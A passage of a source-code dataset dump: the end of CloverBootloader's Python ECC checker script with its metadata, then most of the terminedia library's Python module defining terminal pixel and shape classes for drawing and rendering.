BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\ndef FindPara(FilePath, Para, CallingLine):\r\n Lines = open(FilePath).readlines()\r\n Line = ''\r\n for Index in range(CallingLine - 1, 0, -1):\r\n # Find the nearest statement for Para\r\n Line = Lines[Index].strip()\r\n if Line.startswith('%s = ' % Para):\r\n Line = 
Line.strip()\r\n            return Line\r\n\r\n    return ''\r\n\r\n##\r\n#\r\n# This acts like the main() function for the script, unless it is 'import'ed into another\r\n# script.\r\n#\r\nif __name__ == '__main__':\r\n    Check = Check()\r\n    Check.Check()\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Ecc/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":102607,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"13409686249","text":"import heapq\nimport logging\nimport math\nimport sys\nimport threading\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple, ChainMap, deque\nfrom collections.abc import Sequence\nfrom functools import wraps\nfrom inspect import signature\nfrom itertools import chain\nfrom io import StringIO\nfrom pathlib import Path\nfrom weakref import ref, ReferenceType\n\nfrom terminedia.contexts import Context\nfrom terminedia.sprites import SpriteContainer\nfrom terminedia.subpixels import BrailleChars, HalfChars, SextantChars\nfrom terminedia.unicode import char_width\nfrom terminedia.utils import Color, Rect, V2, LazyBindProperty, get_current_tick, size_in_blocks\nfrom terminedia.unicode_transforms import translate_chars\nfrom terminedia.values import (\n    DEFAULT_FG,\n    DEFAULT_BG,\n    TRANSPARENT,\n    CONTEXT_COLORS,\n    Directions,\n    Effects,\n    CONTINUATION,\n    EMPTY,\n    UNICODE_EFFECTS,\n)\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    from PIL import Image as PILImage\nexcept ImportError:\n    PILImage = None\n\n\n#: Special value that can be sent (.send()) during interaction\n#: on Shape areas, so that the inner iterator does not go up to\n#: the end of a line in the internal buffer if those values\n#: will no longer be used. 
The `drawing.Drawing.blit` method\n#: has the code that sends this.\nSKIP_LINE = object()\n\nPixelClasses = {}\npixel_capabilities = namedtuple(\n    \"pixel_capabilities\", \"value_type has_foreground has_background has_effects\"\n)\n\n\nclass Pixel(tuple):\n    __slots__ = ()\n\n    def __new__(cls, *args, context=None):\n        if args and isinstance(args[0], Pixel):\n            args = args[0].get_values(context, cls.capabilities)\n        return super().__new__(cls, *args)\n\n    def get_values(self, context=None, capabilities=None):\n        \"\"\"Retrieve pixel or context values, according to caller's context and capabilities\n\n        That is, if this pixel provides value as str, fg and bg but no effects,\n        and the target accepts value as boolean, fg, and text effects,\n        a list with those properties set is generated.\n\n        A list is chosen in order to allow further processing of values\n        without recreating the container (for example, to replace\n        'CONTEXT_COLORS' with the actual colors).\n\n        Although passing a context is optional, if any context values are\n        needed for generating the target values, no further tests are done:\n        an AttributeError on the 'None' default context will take place.\n        \"\"\"\n        other_capabilities = capabilities or pixel_capabilities(str, True, True, True)\n        cap = self.capabilities\n        values = []\n        if other_capabilities.value_type == cap.value_type:\n            values.append(self.value)\n        elif other_capabilities.value_type == bool:\n            if cap.value_type == str:\n                values.append(self.value != EMPTY)\n            else:\n                # TODO: When implementing alpha colors,\n                # a full transparent color should evaluate to 'False'\n                values.append(bool(self.value))\n        else:\n            values.append(context.char if self.value else EMPTY)\n\n        if other_capabilities.has_foreground:\n            values.append(self.foreground if cap.has_foreground else context.color)\n        if other_capabilities.has_background:\n            values.append(self.background if cap.has_background else context.background)\n        if other_capabilities.has_effects:\n            values.append(self.effects if cap.has_effects else context.effects)\n\n        return values\n\n\nfull_pixel = namedtuple(\"Pixel\", \"char fg bg effects\")\n\n\ndef pixel_factory(\n    value_type=str,\n    has_foreground=True,\n    has_background=False,\n    has_effects=False,\n    translate_dots=True,\n):\n    \"\"\"Returns a custom pixel class with specified capabilities\n\n    Args:\n      value_type(str or bool): Data type returned by the pixel\n      has_foreground (bool): Whether pixel has a foreground color\n      has_background (bool): Whether pixel has a background color\n      has_effects (bool): Whether pixel has text-attribute flags\n\n    Created pixel classes or instances are not intended to be directly manipulated -\n    instead, they are just a way to convey information from internal images/shapes\n    to methods that will draw them.\n    \"\"\"\n    PixelBase = globals()[\"Pixel\"]\n\n    capabilities = pixel_capabilities(\n        value_type, has_foreground, has_background, has_effects\n    )\n    if capabilities in PixelClasses:\n        Pixel = PixelClasses[capabilities]\n    else:\n        pixel_tuple = namedtuple(\n            \"PixelBase\",\n            (\n                (\"value\",)\n                + ((\"foreground\",) if has_foreground else ())\n                + ((\"background\",) if has_background else ())\n                + ((\"effects\",) if has_effects else ())\n            ),\n        )\n\n        def __repr__(self):\n            return \"Pixel({})\".format(\n                \", \".join(\n                    f\"{field}={getattr(self, field)!r}\" for field in pixel_tuple._fields\n                )\n            )\n\n        Pixel = type(\n            \"Pixel\",\n            (PixelBase, pixel_tuple),\n            {\"capabilities\": capabilities, \"__repr__\": __repr__, \"__slots__\": ()},\n        )\n\n        if translate_dots or value_type != str:\n
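        # A minimal usage sketch for pixel_factory (illustrative only; the
        # values below are made up, not taken from the library's test suite):
        #
        #     BoolPixel = pixel_factory(bool, has_foreground=True)
        #     px = BoolPixel(True, Color((255, 0, 0)))
        #     px.value        # -> True
        #     px.foreground   # -> Color((255, 0, 0))
        #
        # Because the resulting classes are cached in PixelClasses, keyed by
        # their capabilities tuple, calling the factory twice with the same
        # flags yields the same class object.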
@property\n def value(self):\n value = super(Pixel, self).value\n return (\n (value not in (\" .\"))\n if value_type is bool and isinstance(value, str)\n else value_type(value)\n )\n\n Pixel.value = value\n\n PixelClasses[capabilities] = Pixel\n\n return Pixel\n\n\nclass ShapeApiMixin:\n __slots__ = ()\n\n @LazyBindProperty(type=Context)\n def context(self):\n return Context()\n\n @LazyBindProperty\n def draw(self):\n return self._get_drawing()\n\n @LazyBindProperty\n def text(self):\n return self._get_text()\n\n @LazyBindProperty\n def high(self):\n return self._get_highres()\n\n @LazyBindProperty\n def square(self):\n return self._get_highres(block_class=HalfChars, block_width=1, block_height=2)\n\n @LazyBindProperty\n def braille(self):\n return self._get_highres(block_class=BrailleChars, block_height=4)\n\n @LazyBindProperty\n def sextant(self):\n return self._get_highres(block_class=SextantChars, block_height=3)\n\n @LazyBindProperty\n def sprites(self):\n self.has_sprites = True\n return SpriteContainer(self)\n\n @property\n def full(self):\n return self\n\n def at_parent(self, pos):\n \"\"\"emulate high-resolution `at_parent` coordinate transform method: a NOP at full resolution\"\"\"\n return V2(pos)\n\n has_sprites = False\n\n def get_size(self):\n return V2(self.width, self.height)\n\n @property\n def size(self):\n return self.get_size()\n\n _data_func = staticmethod(lambda size: [EMPTY * size.x] * size.y)\n\n def _get_drawing(self):\n from terminedia.drawing import Drawing\n\n # The 'type(self).__setitem__` pattern ensures __setitem__ is called on the proxy,\n # not on the proxied object.\n return Drawing(\n set_fn=lambda pos, pixel=None: type(self).__setitem__(\n self, pos, pixel if pixel else self.context.char\n ),\n reset_fn=lambda pos: type(self).__setitem__(self, pos, EMPTY),\n get_fn=lambda pos: type(self).get_raw(self, pos),\n size_fn=self.get_size,\n context=self.context,\n direct_pixel=getattr(self, \"direct_pixel\", False)\n )\n\n def _get_highres(self, **kw):\n from terminedia.drawing import HighRes\n\n return HighRes(self, **kw)\n\n def _get_text(self):\n from terminedia.text import TextPlane\n\n return TextPlane(self)\n\n def clear(self, transparent=False):\n \"\"\"Clear the shape with empty spaces.\n\n params:\n transparent (bool): whether to use special transparency values\n\n if \"transparent\" is True, the shape is filled with the\n special TRANSPARENT value that make underlying shape characters, or existing tty content\n unchanged upon blitting.\n \"\"\"\n with self.context:\n if transparent:\n self.context.char = TRANSPARENT\n self.context.color = TRANSPARENT\n self.context.background = TRANSPARENT\n self.context.effects = TRANSPARENT\n self.context.force_transparent_ink = True\n else:\n self.context.char = EMPTY\n self.draw.fill()\n self.dirty_set()\n\n def spaces_to_transparency(self):\n from terminedia.transformers.library import AddAlpha\n from terminedia.transformers import TransformersContainer\n ct = TransformersContainer((AddAlpha,))\n with self.context(force_transparent_ink=True):\n ct.bake(self)\n\n\n#####################\n#\n# DIRTY Things:\n# instrumentation to dynamically track modified shape parts, allowing faster frame rendering\n#\n####################\n\nDirtyNode = namedtuple(\"DirtyNode\", \"tick untie rect source\")\n\n_none_ref = lambda : None\n\ndef _ensure_ref(obj):\n if isinstance(obj, ReferenceType):\n return obj\n if obj is None:\n return _none_ref\n if hasattr(obj.__class__, \"__weakref__\"):\n return ref(obj)\n return lambda: 
obj\n\nclass OrderedRegistry:\n # TODO: maybe use a linked list\n\n def __init__(self):\n self.untie = 0\n self.reset()\n\n def reset(self):\n self.data = []\n self.sources = {}\n self.rects = set()\n\n def push(self, node):\n if len(node) == 3:\n node = DirtyNode(node[0], self.untie, node[1], _ensure_ref(node[2]))\n else:\n node = DirtyNode(node[0], self.untie, node[2], _ensure_ref(node[3]))\n self.untie += 1\n\n t = node.rect.as_tuple\n self.sources.setdefault(t, []).append(node)\n self.rects.add(t)\n heapq.heappush(self.data, node)\n\n def reset_to(self, node):\n self.reset()\n self.push(node)\n\n #def clear_left(self, threshold):\n #if not self.data:\n #return\n #counter = 0\n #for node in self.data:\n #if node.tick <= threshold:\n #counter += 1\n #t = node.rect.as_tuple\n #if t in self.sources:\n #for node2 in self.sources[t]:\n #source = node2.source()\n #if hasattr(source, \"dirty_clear\"):\n #source.dirty_clear(threshold)\n #del self.sources[t]\n\n #else:\n #break\n #self.data[:counter] = []\n\n def __iter__(self):\n return iter(self.data)\n\n def __repr__(self):\n return f\"Registry <{self.data}>\"\n\n\n\nDIRTY_TILE_SIZE = 8\n\nclass ShapeDirtyMixin:\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dirty_registry = OrderedRegistry()\n # Mark all shape as dirty:\n self.dirty_set()\n # collection of all changed pixels:\n self.dirty_pixels = set()\n self.dirty_saved_sprite_rects = set()\n self.dirty_sprite_rects_saved_at = 0\n\n def dirty_clear(self, threshold=None):\n tick = threshold if threshold is not None else get_current_tick()\n self.dirty_last_clear = tick\n self.dirty_registry.reset() # clear_left(tick)\n\n self.dirty_save_current_sprite_rects(tick)\n for sprite in self.sprites:\n sprite.shape.dirty_clear()\n\n def dirty_save_current_sprite_rects(self, tick):\n self.dirty_sprite_rects_saved_at = tick\n self.dirty_saved_sprite_rects = set()\n if not self.has_sprites:\n return\n for sprite in self.sprites:\n for rect in sprite.dirty_rects:\n self.dirty_saved_sprite_rects.update(sprite.dirty_rects)\n\n def dirty_set(self, rect=None):\n tick = get_current_tick()\n if rect is None:\n rect = Rect((0, 0), self.size)\n else:\n rect = Rect(rect) if not isinstance(rect, Rect) else rect\n self.dirty_registry.reset_to((tick, rect, None))\n\n def dirty_update(self):\n\n tick = get_current_tick()\n\n # If there is any time-dependant image change, there is no way\n # to predict what changes from one frame to the next - just mark\n # all shape as dirty.\n if any(\"tick\" in sig for transformer in self.context.transformers for sig in transformer.signatures.values()):\n self.dirty_set()\n return\n\n # Collect rects from sprites\n if self.has_sprites:\n for sprite in self.sprites:\n if not sprite.active:\n continue\n\n if any(\"tick\" in sig for transformer in sprite.transformers for sig in transformer.signatures.values()):\n self.dirty_registry.push((tick, sprite.rect, sprite.shape))\n else:\n for rect in sprite.dirty_rects:\n self.dirty_registry.push((tick, sprite.owner_coords(rect), sprite.shape))\n if self.sprites.killed_sprites:\n for rect in self.sprites.killed_sprites:\n self.dirty_registry.push((tick, rect, None))\n self.sprites.killed_sprites.clear()\n\n # mark dirty pixels\n\n tile_size = (DIRTY_TILE_SIZE, DIRTY_TILE_SIZE)\n self_rect = Rect((0, 0), self.size)\n for tile in self.dirty_pixels:\n rect = Rect(tile * DIRTY_TILE_SIZE, width_height=tile_size)\n rect = rect.intersection(self_rect)\n if not rect:\n continue\n self.dirty_registry.push((tick, 
rect, None))\n        self.dirty_pixels = set()\n\n    def dirty_mark_pixel(self, index):\n        self.dirty_pixels.add(index // DIRTY_TILE_SIZE)\n\n    @property\n    def dirty_rects(self):\n        self.dirty_update()\n        # on purpose eager approach - the registry might be updated while rendering is taking place\n        return self.dirty_registry.rects.copy()\n\n    # return [node.rect for node in self.dirty_registry if self.dirty_registry.sources[node.rect.as_tuple][0].untie == node.untie]\n\n##############\n#\n# SHAPE:\n# Base class for all high-level imaging\n#\n#############\n\nclass Shape(ABC, ShapeApiMixin, ShapeDirtyMixin):\n    \"\"\"'Shape' is intended to represent blocks of colors/backgrounds and characters\n    to be applied in a rectangular area of the terminal. In this sense, it is\n    more complicated than an \"Image\" that just cares about a foreground color\n    and alpha value for each pixel position.\n\n    As internal data and rendering intents vary across desired capabilities,\n    there are subclasses to represent each intended use.\n\n    \"\"\"\n\n    PixelCls = pixel_factory(bool)\n    _default_bg = False\n\n    isroot = False\n\n    @classmethod\n    def new(cls, size, **kwargs):\n        \"\"\"Creates an empty shape of this class.\n\n        Args:\n          - size (2-sequence): width x height of the new shape\n          - **kwargs: keyword arguments either to the class empty-data builder\n                      (cls._data_func) - e.g. \"color\" - or for the\n                      class' __init__ - e.g. color_map.\n\n        Creates a new empty shape, using given size and keyword parameters,\n        which are dispatched as appropriate to build the empty pixel\n        values or to the class itself.\n        \"\"\"\n        data_parameters = signature(cls._data_func).parameters.keys()\n        data_kw = {}\n        for name, value in list(kwargs.items()):\n            if name in data_parameters:\n                data_kw[name] = value\n                kwargs.pop(name)\n        data = cls._data_func(V2(size), **data_kw)\n        return cls(data, **kwargs)\n\n    def load_data(self, data, size=None):\n        \"\"\"Sets internal data from an initial value structure.\n        Args:\n          - data: data structure containing the elements\n                  that will be set to initial pixel values.\n                  Can be a single sequence width x height\n                  in size containing all elements\n                  to be assigned as pixels, or a\n                  height-sized sequence of width-sized sequences.\n          - size (V2-like): width x height.\n\n        Used to explicitly set the initial values for a shape,\n        will usually be called internally as part of the\n        Shape initialization. If size is not given, and\n        the passed data is 1D in nature, size is assumed to\n        be a single column (1xN) shape. Strings are split\n        at \"\\\\n\" and will be treated as 2D if multiline.\n        \"\"\"\n        if isinstance(data, str):\n            data = data.split(\"\\\\n\")\n        if not size:\n            size = V2(len(data[0]), len(data))\n        self.width = w = size[0]\n        self.height = h = size[1]\n\n        if len(data) == w * h:\n            self.data = list(data)\n        else:\n            if len(data) != h:\n                logger.warning(\n                    \"Passed size is inconsistent with data shape. 
Proceeding anyway\"\n                )\n            self.data = []\n            for line in data:\n                self.data.extend(list(line))\n        return self.data\n\n    def get_data_offset(self, pos):\n        if pos[0] < 0 or pos[1] < 0 or pos[0] >= self.width or pos[1] >= self.height:\n            return None\n        return pos[1] * self.width + pos[0]\n\n    def get_raw(self, pos):\n        offset = self.get_data_offset(pos)\n        if offset is None:\n            # TODO: implement abyss_policy in context?\n            return EMPTY\n        return self.data[offset]\n\n    @abstractmethod\n    def __getitem__(self, pos):\n        \"\"\"Common logic to create ShapeViews from slices.\n\n        Pixel data retrieving is implemented in the subclasses.\n        \"\"\"\n        if isinstance(pos, Rect):\n            roi = pos\n        elif isinstance(pos, tuple) and isinstance(pos[0], slice):\n            if any(pos[i].step not in (None, 1) for i in (0, 1)):\n                raise NotImplementedError(\"Slice stepping not implemented for shapes\")\n            roi = Rect(*pos)\n        else:\n            return None\n        return ShapeView(self, roi)\n\n    @abstractmethod\n    def __setitem__(self, pos, value):\n        \"\"\"Values set for each pixel are: character, fg_color, bg_color\n        \"\"\"\n        raise NotImplementedError(\"This is meant as an abstract Shape class\")\n\n    def __iter__(self):\n        \"\"\"Iterates over all pixels in Shape\n\n        For each pixel in the image, returns its position,\n        its value, the foreground color, background color, and character_effects byte\n        \"\"\"\n        for y in range(self.height):\n            for x in range(self.width):\n                pos = V2(x, y)\n                token = yield (pos, self[pos])\n                if token is SKIP_LINE:\n                    yield None\n                    break\n\n    def concat(self, *others, direction=Directions.RIGHT, **kwargs):\n        \"\"\"Concatenates two given shapes side by side into a larger shape.\n\n        Args:\n          - other (Shape): Other shape to be concatenated.\n          - direction (V2): Side which will be \"enlarged\" and on which the other shape\n                will be placed. Most useful values are Directions.RIGHT and Directions.DOWN\n          - **kwargs: are passed down to the \"new\" constructor of the resulting shape.\n\n        Creates a new shape combining two or more other shapes. If Shape _allowed_types differ,\n        the logic in Drawing.blit will try to cast pixels to the one used in self.\n        \"\"\"\n        shapes = (self,) + others\n\n        direction = V2(direction)\n\n        h_size = abs(direction.x) * sum(s.width for s in shapes)\n        v_size = abs(direction.y) * sum(s.height for s in shapes)\n        new_size = V2(\n            max(h_size, max(s.width for s in shapes)),\n            max(v_size, max(s.height for s in shapes)),\n        )\n\n        new_shape = self.__class__.new(new_size, **kwargs)\n\n        d = direction\n        offset = V2(0 if d.x >= 0 else new_size.x, 0 if d.y >= 0 else new_size.y)\n\n        # blit always takes the top-left offset corner\n        # so, depending on direction of concatenation,\n        # offset has to be computed before or after blitting.\n        for s in shapes:\n            offset += (\n                int(s.width * d.x if d.x < 0 else 0),\n                int(s.height * d.y if d.y < 0 else 0),\n            )\n            new_shape.draw.blit(offset, s)\n            offset += (\n                int(s.width * d.x if d.x >= 0 else 0),\n                int(s.height * d.y if d.y >= 0 else 0),\n            )\n\n        return new_shape\n\n    def render(self, output=None, backend=\"ANSI\"):\n        \"\"\"Renders shape contents into a text-output.\n        Args:\n          - backend (str): output type - currently implemented: \"ANSI\", \"HTML\" and \"SNAPSHOT\"\n          - output(Optional[Union[TextIO, BytesIO]])\n        Output:\n          ->Optional[Union[str, bytes]]\n\n        Renders shape contents into content that can represent the image\n        outside the terminedia library. That is, if the shape is rendered with \"ANSI\",\n        a text body, with the ESC encoded ANSI sequences for cursor positioning\n        embedded will be generated. 
If this body is subsequently printed, the\n        image in the Shape is reproduced on the terminal.\n\n        If output is given, it should be a file-like object to which the contents\n        of the shape will be written. Binary backends require a binary file. The method then returns None.\n        If no output is given, the rendered contents are returned.\n        \"\"\"\n        backend = backend.upper()\n        original_output = output\n\n        self.dirty_set()\n\n        if isinstance(output, (str, Path)):\n            output = open(\n                output, \"w\" + (\"t\" if backend in (\"ANSI\", \"HTML\") else \"b\")\n            )\n\n        if not original_output:\n            output = StringIO()\n\n        if backend == \"ANSI\":\n            self._render_using_screen(output, backend)\n        elif backend == \"HTML\":\n            # FIXME: this somewhat violates the rule that \"this module should not know about\n            # specific backend stuff (HTML template).\"\n            # However, the rendering machinery only knows\n            # about incremental rendering, and can't \"sandwich\"\n            # the final rendering. In any case, the outer HTML template\n            # should be configurable in the near future.\n            from terminedia.html import full_body_template\n\n            preamble, post_amble = full_body_template.split(\"{content}\")\n            output.write(preamble)\n            self._render_using_screen(output, backend)\n            output.write(post_amble)\n        elif backend == \"SNAPSHOT\":\n            import pickle\n            tmp = ShalowShapeRepr(self)\n            pickle.dump(tmp, output)\n        else:\n            raise ValueError(f\"Output type {backend!r} not implemented\")\n        if not original_output:\n            return output.getvalue()\n\n    def _render_using_screen(self, output, backend):\n        from terminedia.screen import Screen\n\n        if output is None:\n            file = StringIO()\n        else:\n            file = output\n        sc = Screen(size=V2(self.width, self.height), backend=backend, interactive=False)\n        if backend == \"ANSI\":\n            # generate a relocatable image\n            sc.commands.__class__.last_pos = V2(0, 0)\n            sc.commands.absolute_movement = False\n            sc.commands.force_newlines = True\n        # Starts recording all image operations on the internal journal\n        sc.commands.__enter__()\n        sc.blit((0, 0), self)\n        # Ends journal-recording, but without calling __exit__\n        # which does not allow passing an external file.\n        sc.commands.stop_journal()\n        # Renders all graphic ops as ANSI sequences + unicode into file:\n        sc.commands.replay(output)\n        output.write(\"\\\\x1b[0m\")  # reset all ansi attributes\n\n    def __repr__(self):\n        cap = self.PixelCls.capabilities\n        bck = cap.has_background\n        ftn = cap.has_foreground\n        eff = cap.has_effects\n        size = self.get_size()\n        rep = \"\".join(\n            [\n                self.__class__.__name__,\n                \": [\\\\n\",\n                \"value_type = \" + repr(cap.value_type) + \"\\\\n\" if cap.value_type else \"\",\n                \"foreground\\\\n\" if ftn else \"\",\n                \"background\\\\n\" if bck else \"\",\n                \"effects\\\\n\" if eff else \"\",\n                f\"size = {size.x}, {size.y}\\\\n\",\n                \"]\",\n            ]\n        )\n        return rep\n\n    def _resize_data_one(self, new_size, data, fill_value):\n        old_size = V2(self.width, self.height)\n        lines = [data[i : i + old_size.x] for i in range(0, len(data), old_size.x)]\n        new_data = []\n        diff = new_size.x - old_size.x\n        for y, line in zip(range(new_size.y), lines):\n\n            if diff > 0:\n                line.extend([fill_value] * diff)\n            elif diff < 0:\n                line[diff:] = []\n            new_data.extend(line)\n\n        y_diff = new_size.y - old_size.y\n        if y_diff > 0:\n            new_data.extend([fill_value] * new_size.x * y_diff)\n\n        return new_data\n\n    def _resize_data(self, new_size):\n        self.data = self._resize_data_one(new_size, self.data, fill_value=getattr(self.context, \"background_char\", self.__class__._default_bg))\n\n    def resize(self, new_size):\n        new_size = V2(new_size)\n
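        # A short usage sketch for Shape.render above (the file names are
        # hypothetical):
        #
        #     sh = FullShape.new((10, 5))
        #     ansi_text = sh.render()                    # ANSI string, suitable for print()
        #     sh.render(output="shape.html", backend="HTML")          # standalone HTML page
        #     sh.render(output="shape.snapshot", backend="SNAPSHOT")  # pickled ShalowShapeRepr
        #
        # With no "output" argument the rendered content is returned;
        # otherwise it is written to the given path or file-like object.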
        self._resize_data(new_size)\n        self.width, self.height = new_size\n        if hasattr(self, \"rect\"):\n            self.rect = Rect(new_size)\n        self.dirty_set()\n\n\n# \"Virtual subclassing\" - two days after I wrote there were no\n# practical uses for it.\n# With it, \"ShapeView\" can have \"__slots__\"\n@Shape.register\nclass ShapeView(ShapeApiMixin):\n    __slots__ = (\"roi\", \"original\", \"_draw\", \"_high\", \"_text\")\n\n    isroot = False\n\n    def __init__(self, original, roi):\n        self.original = original\n        self.roi = Rect(roi)\n\n    width = property(lambda s: s.roi.width)\n    height = property(lambda s: s.roi.height)\n    get_size = lambda s: s.roi.width_height\n\n    def __getitem__(self, index):\n        roi = self.roi\n        if isinstance(index, Rect):\n            return ShapeView(\n                self.original,\n                Rect(\n                    V2.max(roi.c1, (roi.c1 + index.c1)),\n                    V2.min((roi.c1 + index.c2), roi.c2),\n                ),\n            )\n        if not 0 <= index[0] < roi.width or not 0 <= index[1] < roi.bottom:\n            raise IndexError(f\"Value out of limits {roi.width_height}\")\n        return self.original[roi.c1 + index]\n\n    def __setitem__(self, index, value):\n        roi = self.roi\n        if not 0 <= index[0] < roi.width or not 0 <= index[1] < roi.bottom:\n            raise IndexError(f\"Value out of limits {roi.width_height}\")\n        self.original[roi.c1 + index] = value\n\n    __iter__ = Shape.__iter__\n\n    def __getattribute__(self, attr):\n        # Attributes not proxied in ShapeView\n        if attr in {\n            \"roi\",\n            \"original\",\n            \"width\",\n            \"height\",\n            \"size\",\n            \"get_size\",\n            \"draw\",\n            \"high\",\n            \"text\",\n            \"isroot\",\n            \"_draw\",\n            \"_high\",\n            \"_text\",\n            \"_get_drawing\",\n            \"_get_highres\",\n            \"_get_text\",\n        }:\n            return super().__getattribute__(attr)\n        return getattr(self.original, attr)\n\n    def __repr__(self):\n        return f\"View {self.roi} of {self.original}\"\n\n\nclass ValueShape(Shape):\n\n    PixelCls = pixel_factory(bool, has_foreground=True)\n\n    _data_func = staticmethod(lambda size, color=(0, 0, 0): [[color] * size.x] * size.y)\n    _allowed_types = (Path, str, Sequence)\n\n    def __init__(self, data, color_map=None, size=None, **kwargs):\n        # TODO: make color_map work as a to-pixel palette information\n        # to L or I images - not only providing a color palette,\n        # but also enabling a \"palette color to character\" mapping.\n        self.color_map = color_map\n        if isinstance(data, self._allowed_types) or hasattr(data, \"read\"):\n            self.load_data(data, size)\n        else:\n            raise NotImplementedError(f\"Can't load shape from {type(data).__name__}\")\n        super().__init__(**kwargs)\n\n    def __getitem__(self, pos):\n        \"\"\"Composes a Pixel object for the given coordinates.\n        \"\"\"\n        v = super().__getitem__(pos)\n        if v:\n            return v\n\n        color = self.get_raw(pos)\n        if color is EMPTY:\n            color = self.context.background\n\n        return self.PixelCls(True, color)\n\n    def __setitem__(self, pos, value):\n        \"\"\"\n        Values set for each pixel are 3-sequences with an RGB color value\n        \"\"\"\n        pos = V2(pos)\n        self.dirty_mark_pixel(pos)\n        color = value\n        if isinstance(value, Pixel):\n            v, color = value.get_values(self.context, self.PixelCls.capabilities)\n        elif isinstance(value, (int, tuple, Color)):\n            color = Color(value)\n        elif isinstance(value, str):\n            color = self.context.color if value != EMPTY else self.context.background\n        self._raw_setitem(pos, color)\n\n    def _raw_setitem(self, pos, color):\n        offset = self.get_data_offset(pos)\n        if offset is None:\n            return\n        self.data[offset] = color\n\n\nclass PGMShape(ValueShape):\n\n    PixelCls = pixel_factory(bool, has_foreground=True)\n    _allowed_types = (Path, str)\n\n    def load_data(self, file_or_path, 
size=None):\n        \"\"\"Will load data from a PGM/PPM file.\n        Size parameter is ignored\n        \"\"\"\n        if not hasattr(file_or_path, \"read\"):\n            file = open(file_or_path, \"rb\")\n        else:\n            file = file_or_path\n        raw_data = file.read()\n        if raw_data[0] == ord(b\"P\") and raw_data[2] in b\"\\\\r\\\\n\":\n            return self._decode_pnm(raw_data)\n        raise NotImplementedError(\"File format not supported. Try installing 'Pillow'\")\n\n    def _decode_pnm(self, data):\n        headers = []\n        header_counter = 0\n        offset = 0\n        while True:\n            line_end = data.find(b\"\\\\n\", offset)\n            line = data[offset : line_end + 1]\n            offset = line_end + 1\n            if line.strip().startswith(b\"#\"):\n                continue\n            headers.append(line.strip())\n            header_counter += 1\n            if header_counter == 3:\n                break\n        type_, size, max_value = headers\n\n        size = V2(*map(int, size.split()))\n        max_value = int(max_value)\n\n        self.width, self.height = size\n\n        type_num = int(type_[1:2])\n        if type_num == 2:\n            # ASCII encoding, monochrome file\n            ascii, values_per_pixel = True, 1\n        elif type_num == 3:\n            ascii, values_per_pixel = True, 3\n        elif type_num == 5:\n            ascii, values_per_pixel = False, 1\n        elif type_num == 6:\n            ascii, values_per_pixel = False, 3\n        else:\n            raise NotImplementedError(\n                f\"File not supported. PNM with magic number: {type_.decode()!r}\"\n            )\n\n        data = data[offset:]\n        if ascii:\n            data = [int(v) for v in data.split()]\n        if len(data) != size.x * size.y * values_per_pixel:\n            logger.warning(\"Malformed PNM file. Trying to continue anyway\\\\n\")\n\n        data = [value / max_value for value in data]\n        if values_per_pixel == 1:\n            data = [(value, value, value) for value in data]\n        else:\n            data = [tuple(data[i : i + 3]) for i in range(0, len(data), 3)]\n        self.data = data\n\n\nclass ImageShape(ValueShape):\n    \"\"\"Relies on Python Imaging Library to load and handle image data.\n\n    The internal \"data\" member is an actual PIL.Image instance,\n    and one is free to use PIL drawing and image manipulation APIs\n    to draw on it.\n\n    Important: on instantiating these shapes, Terminedia will\n    try to auto-scale down/resample the image to compensate for\n    the aspect-ratio of text images. 
Pass the parameter `auto_scale=False`\n    to `__init__` or `__new__` to preserve the exact size of the\n    PIL Image.\n\n    \"\"\"\n\n    PixelCls = pixel_factory(bool, has_foreground=True)\n\n    _data_func = staticmethod(\n        lambda size, mode=\"RGB\", color=(0, 0, 0): PILImage.new(mode, size, color=color)\n    )\n    if PILImage:\n        _allowed_types = (str, Path, PILImage.Image)\n\n    def load_data(self, file_or_path, size=None, half_height=False):\n        \"\"\"Will load data from an image file using PIL,\n\n        If \"size\" is not passed, the native image size is used.\n        Otherwise it should be a 2-sequence: if both numbers\n        are given, that is used as final image size.\n        If one component of \"size\" is \"None\", the other\n        one is used to scale the image, keeping its aspect ratio.\n\n        Due to the nature of character blocks, keeping the aspect ratio can\n        lead to a strange 1:2 final display, pass \"half_height=True\"\n        to keep the same visual aspect ratio for full blocks.\n        (hint: you can load the full height and blit\n        the resulting shape to a square 1/2 block drawable instead)\n\n        \"\"\"\n        if isinstance(file_or_path, PILImage.Image):\n            img = file_or_path\n        else:\n            img = PILImage.open(file_or_path)\n        img_size = V2(img.width, img.height)\n        if size is None:\n            size = img_size\n        else:\n            size = V2(size) #- (1, 1)\n            if size.x is None:\n                size = V2(img_size.x * (size.y / img_size.y), size.y).as_int\n            elif size.y is None:\n                size = V2(size.x, img_size.y * (size.x / img_size.x)).as_int\n\n        pixel_ratio = 1 if not half_height else 0.5\n\n        if size.x != img_size.x or size.y * pixel_ratio != img_size.y:\n            ratio_x = size.x / img_size.x\n            ratio_y = (size.y / img_size.y) * pixel_ratio\n            img = img.resize(size.as_int, PILImage.BICUBIC)\n\n        self.width, self.height = img.width, img.height\n\n        if img.mode in (\"L\", \"P\", \"I\"):\n            img = img.convert(\"RGB\")\n        elif img.mode in (\"LA\", \"PA\"):\n            img = img.convert(\"RGBA\")\n        self.data = img\n\n    def get_raw(self, pos):\n        return self.data.getpixel(pos)\n\n    def _raw_setitem(self, pos, color):\n        if isinstance(color, Color):\n            color = tuple(color)\n        self.data.putpixel(pos, color)\n\n    def resize(self, new_size):\n        self.data = self.data.resize(new_size)\n        self.width, self.height = self.data.width, self.data.height\n\n    def clear(self, transparent=False):\n        img = self.data\n        # FIXME: might need to check and upgrade the image to RGBA first\n        color = tuple(self.context.background) if not transparent else (0, 0, 0, 0)\n        img.paste(color, [0, 0, img.size[0], img.size[1]])\n\n\nclass PalettedShape(Shape):\n    \"\"\"'Shape' class intended to represent images, using a color-map to map characters to block colors.\n\n    Args:\n      - data (multiline string or list of strings): character map to be used as pixels\n      - color_map (optional mapping): maps characters to RGB colors.\n    This class has no special per-pixel values for background or character - each\n    block position will read as \"False\" or \"True\" depending only on the\n    underlying character in the input data being space (0x20) or any other thing.\n    \"\"\"\n\n    foreground = True\n    background = False\n    arbitrary_chars = False\n    effects = False  # FUTURE: support for bold, blink, underline...\n\n    PixelCls = pixel_factory(bool, has_foreground=True)\n    _default_bg = 